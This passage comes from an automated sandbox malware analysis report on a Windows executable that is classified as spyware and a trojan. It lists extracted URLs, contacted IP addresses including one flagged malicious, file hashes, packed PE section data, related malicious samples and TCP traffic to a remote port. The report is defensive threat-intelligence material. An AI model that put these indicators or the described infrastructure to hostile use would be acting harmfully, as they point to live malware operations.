                                                                                              http://tempuri.org/Entity/Id1184Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://tempuri.org/Entity/Id1284Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://tempuri.org/Entity/Id16Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://tempuri.org/Entity/Id1384Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://tempuri.org/Entity/Id1484Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://tempuri.org/Entity/Id1584Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://tempuri.org/Entity/Id1684Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://tempuri.org/Entity/Id1784Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://tempuri.org/Entity/Id1884Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://tempuri.org/Entity/Id5Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://tempuri.org/Entity/Id1984Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id10Response84Xhvb840M.exe, 00000000.00000002.341549842.0000000003DA9000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Renew84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id8Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341497974.0000000003D45000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.084Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentity84Xhvb840M.exe, 00000000.00000002.341099277.000000000397C000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA184Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id23Response84Xhvb840M.exe, 00000000.00000002.341549842.0000000003DA9000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341099277.000000000397C000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/06/addressingex84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                                                                    high

                                                                                                                                    Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    37.1.213.57
                                                                                                                                    unknownUkraine
                                                                                                                                    29802HVC-ASUStrue
                                                                                                                                    94.250.250.30
                                                                                                                                    unknownRussian Federation
                                                                                                                                    29182THEFIRST-ASRUfalse

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                    Analysis ID:534012
                                                                                                                                    Start date:05.12.2021
                                                                                                                                    Start time:00:26:30
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 6m 27s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Sample file name:84Xhvb840M.exe
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Number of analysed new started processes analysed:22
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/1@0/2
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HDC Information:Failed
                                                                                                                                    HCA Information:Failed
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.4.86
                                                                                                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    00:27:41API Interceptor66x Sleep call for process: 84Xhvb840M.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    37.1.213.574EgMmMyCzy.exeGet hashmaliciousBrowse
                                                                                                                                      94.250.250.304EgMmMyCzy.exeGet hashmaliciousBrowse
                                                                                                                                      • 94.250.250.30/Chrome.exe

                                                                                                                                      Domains

                                                                                                                                      No context

                                                                                                                                      ASN

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      HVC-ASUS4EgMmMyCzy.exeGet hashmaliciousBrowse
                                                                                                                                      • 37.1.213.57
                                                                                                                                      sora.armGet hashmaliciousBrowse
                                                                                                                                      • 66.232.127.213
                                                                                                                                      6i8fGaNHr7Get hashmaliciousBrowse
                                                                                                                                      • 104.156.53.55
                                                                                                                                      DOKUMEN_BPN_PHER001_021458989062000_INCONIS NUSA JAYA_125716432184000.pdf.exeGet hashmaliciousBrowse
                                                                                                                                      • 23.111.183.178
                                                                                                                                      gunzipped.exeGet hashmaliciousBrowse
                                                                                                                                      • 23.111.183.178
                                                                                                                                      IEGEmivcv5.dllGet hashmaliciousBrowse
                                                                                                                                      • 37.1.208.91
                                                                                                                                      IEGEmivcv5.dllGet hashmaliciousBrowse
                                                                                                                                      • 37.1.208.91
                                                                                                                                      V6oWh8Z20j.dllGet hashmaliciousBrowse
                                                                                                                                      • 37.1.208.91
                                                                                                                                      V6oWh8Z20j.dllGet hashmaliciousBrowse
                                                                                                                                      • 37.1.208.91
                                                                                                                                      beamer.arm7-20211121-1750Get hashmaliciousBrowse
                                                                                                                                      • 64.110.163.229
                                                                                                                                      1Yt2YYpm81.exeGet hashmaliciousBrowse
                                                                                                                                      • 46.21.153.132
                                                                                                                                      fc#Ubb38.exeGet hashmaliciousBrowse
                                                                                                                                      • 46.21.153.132
                                                                                                                                      X5J1LghiBc.exeGet hashmaliciousBrowse
                                                                                                                                      • 46.21.153.132
                                                                                                                                      ORDER.exeGet hashmaliciousBrowse
                                                                                                                                      • 46.21.149.90
                                                                                                                                      ncMG8wu5IGGet hashmaliciousBrowse
                                                                                                                                      • 209.133.205.122
                                                                                                                                      x86Get hashmaliciousBrowse
                                                                                                                                      • 66.232.127.212
                                                                                                                                      K1kUt3MxkSGet hashmaliciousBrowse
                                                                                                                                      • 107.155.88.167
                                                                                                                                      0pxHGTARwb.exeGet hashmaliciousBrowse
                                                                                                                                      • 37.1.211.108
                                                                                                                                      lk0jzxi2j8Get hashmaliciousBrowse
                                                                                                                                      • 149.255.39.221
                                                                                                                                      PdEfGHtczV.exeGet hashmaliciousBrowse
                                                                                                                                      • 209.133.197.146
                                                                                                                                      THEFIRST-ASRU4EgMmMyCzy.exeGet hashmaliciousBrowse
                                                                                                                                      • 94.250.250.30
                                                                                                                                      Ks9bGNkP7HGet hashmaliciousBrowse
                                                                                                                                      • 82.146.49.35
                                                                                                                                      H5mUEYGVHO.exeGet hashmaliciousBrowse
                                                                                                                                      • 92.63.100.139
                                                                                                                                      AR2mg6uJta.exeGet hashmaliciousBrowse
                                                                                                                                      • 62.109.1.30
                                                                                                                                      q2IHJg2N4T.exeGet hashmaliciousBrowse
                                                                                                                                      • 62.109.1.30
                                                                                                                                      47XJbPecPL.exeGet hashmaliciousBrowse
                                                                                                                                      • 188.120.224.18
                                                                                                                                      8NbzcpdWOj.exeGet hashmaliciousBrowse
                                                                                                                                      • 62.109.5.94
                                                                                                                                      eoOv0FjPOF.exeGet hashmaliciousBrowse
                                                                                                                                      • 62.109.5.94
                                                                                                                                      nuGPQqt9iK.exeGet hashmaliciousBrowse
                                                                                                                                      • 62.109.5.94
                                                                                                                                      sora.arm7Get hashmaliciousBrowse
                                                                                                                                      • 62.109.30.177
                                                                                                                                      E9HT1FxV8BGet hashmaliciousBrowse
                                                                                                                                      • 62.109.30.191
                                                                                                                                      7821D9459863256AF01FF48B99FFD938AACA3BECE1B4B.exeGet hashmaliciousBrowse
                                                                                                                                      • 62.109.0.171
                                                                                                                                      JjBWuAByqr.exeGet hashmaliciousBrowse
                                                                                                                                      • 188.120.243.11
                                                                                                                                      PjvBTyWpg6.exeGet hashmaliciousBrowse
                                                                                                                                      • 188.120.231.18
                                                                                                                                      Whrw7Kmlni.exeGet hashmaliciousBrowse
                                                                                                                                      • 80.87.192.115
                                                                                                                                      Hpdyv8oO3j.exeGet hashmaliciousBrowse
                                                                                                                                      • 82.202.167.226
                                                                                                                                      3rhn9uaPHu.exeGet hashmaliciousBrowse
                                                                                                                                      • 79.174.13.108
                                                                                                                                      B8ZmJk9TpG.exeGet hashmaliciousBrowse
                                                                                                                                      • 79.174.13.108
                                                                                                                                      EEFB1FBB690C0C28F191FBC443793D4BADC01ECEE0416.exeGet hashmaliciousBrowse
                                                                                                                                      • 77.246.159.252
                                                                                                                                      Lulu_Hack.exeGet hashmaliciousBrowse
                                                                                                                                      • 94.250.250.77

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      No context

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\84Xhvb840M.exe.log
                                                                                                                                      Process:C:\Users\user\Desktop\84Xhvb840M.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2291
                                                                                                                                      Entropy (8bit):5.3192079301865585
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MxHKXwYHKhQnoOfHK7HKhBHKdHKB1AHKzvQTHmtHoxHImHK1HxLHG1qHjHKdH5HX:iqXwYqhQnoSq7qLqdqUqzcGtIxHbq1RW
                                                                                                                                      MD5:5F5F055562F694BB5364921FDE3B5147
                                                                                                                                      SHA1:9DD1FD1111299F29EC90334EA0BDC9F5ADB21062
                                                                                                                                      SHA-256:9A78763D556730E9F1BD801BE7022DDC02D408A30D3F01F2B7CAED2457B7F9EA
                                                                                                                                      SHA-512:7EA19AE041B7F42ACAFC0476EB20E7D9DB9C4A82E06CE8CE273EECD580E158AF9E703B2673D5F7B39FF8549F8869B73537F62E799BE471AFF521F43D3C892CED
                                                                                                                                      Malicious:true
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicK

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.993394255319144
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:84Xhvb840M.exe
                                                                                                                                      File size:1607424
                                                                                                                                      MD5:a299e78d8704d2840a0466488f5fe3d9
                                                                                                                                      SHA1:479a930f871cba97457415b8246fd490f8895b3f
                                                                                                                                      SHA256:129f4f1ff9ed242fe57ac927522a46d3a35a48c38003fbb464c421981b63a813
                                                                                                                                      SHA512:89d9744af351f2882020af09d7c69edf5ca782c58770acf7a65dcf649c2ba7eb9c68764215251b1ce332b0a388757019f852afbe985ddaf30744c4f8d5ef6631
                                                                                                                                      SSDEEP:49152:jXiaO75eGvloS2755KdPHPM9ctS4Na+rM:Od091uPHPM9ctSAJw
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..N........... ... ........@.. .......................`A.. ....:....................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x402000
                                                                                                                                      Entrypoint Section:
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x61A7C1F7 [Wed Dec 1 18:41:59 2021 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:d7dd6fa75115d9909f747434e40fff68

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      push 007C8001h
                                                                                                                                      call 00007F62047AECB6h
                                                                                                                                      ret
                                                                                                                                      ret
                                                                                                                                      dec ecx
                                                                                                                                      insb
                                                                                                                                      add dword ptr [esp+ecx*2-351396BAh], edi
                                                                                                                                      insd
                                                                                                                                      cmc
                                                                                                                                      iretd
                                                                                                                                      dec esp
                                                                                                                                      adc esi, dword ptr [edx-1Eh]
                                                                                                                                      sbb ecx, dword ptr [ebp-6DE8E7D3h]

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8c7c0xd8.QWly1rx
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x420000x586.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x100000

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      0x20000x360000x15a00False1.00040643064data7.99802724381IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      0x380000x20000x400False1.0107421875data7.77053321914IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      0x3a0000x20000x200False0.78515625data6.01747597045IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      0x3c0000x40000x400False1.0107421875data7.80942798026IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      0x400000x20000x200False1.021484375data7.57592238998IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0x420000x20000x600False0.439453125data4.1308503709IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      0x440000x3840000x126600unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      .QWly1rx0x3c80000x4c0000x4a600False0.987362132353data7.91678620478IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                      .adata0x4140000x20000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                      RT_VERSION0x420a00x2fcdata
                                                                                                                                      RT_MANIFEST0x4239c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminatorsEnglishUnited States

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      kernel32.dllGetProcAddress, GetModuleHandleA, LoadLibraryA
                                                                                                                                      mscoree.dll_CorExeMain
                                                                                                                                      oleaut32.dllVariantChangeTypeEx
                                                                                                                                      kernel32.dllRaiseException

                                                                                                                                      Version Infos

                                                                                                                                      DescriptionData
                                                                                                                                      LegalCopyrightMaNhxeY9
                                                                                                                                      Assembly Version4,14,12,0
                                                                                                                                      InternalNamevXvp3ptm
                                                                                                                                      FileVersion4,14,12,0
                                                                                                                                      CompanyName60eOmLgQ
                                                                                                                                      CommentsLDVAAEpw
                                                                                                                                      ProductNameOdySAJZ2
                                                                                                                                      ProductVersion4,14,12,0
                                                                                                                                      FileDescriptionKFoYONN2
                                                                                                                                      OriginalFilenameW2gUpyDh
                                                                                                                                      Translation0x0000 0x04b0

                                                                                                                                      Possible Origin

                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishUnited States

                                                                                                                                      Network Behavior

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 5, 2021 00:27:28.553688049 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:28.676100969 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:28.676260948 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:28.856601954 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:28.979038954 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:29.023879051 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:29.738450050 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:29.862330914 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:29.914596081 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:36.831891060 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:36.962618113 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:36.962687969 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:36.962726116 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:36.962769032 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:37.008929014 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:39.920125008 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:40.044250965 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:40.080053091 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:40.202528954 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:40.234002113 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:40.356580019 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:40.399893999 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:40.495369911 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:40.620423079 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:40.620474100 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:40.622190952 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:40.665544987 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:40.750760078 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:40.873543978 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:40.915988922 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:41.038532972 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:41.088752985 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:43.767205000 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:43.890922070 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:43.947005987 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:45.092458963 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:45.216255903 CET172924974237.1.213.57192.168.2.3
                                                                                                                                      Dec 5, 2021 00:27:45.259910107 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:45.311480045 CET4974217292192.168.2.337.1.213.57
                                                                                                                                      Dec 5, 2021 00:27:45.433811903 CET172924974237.1.213.57192.168.2.3
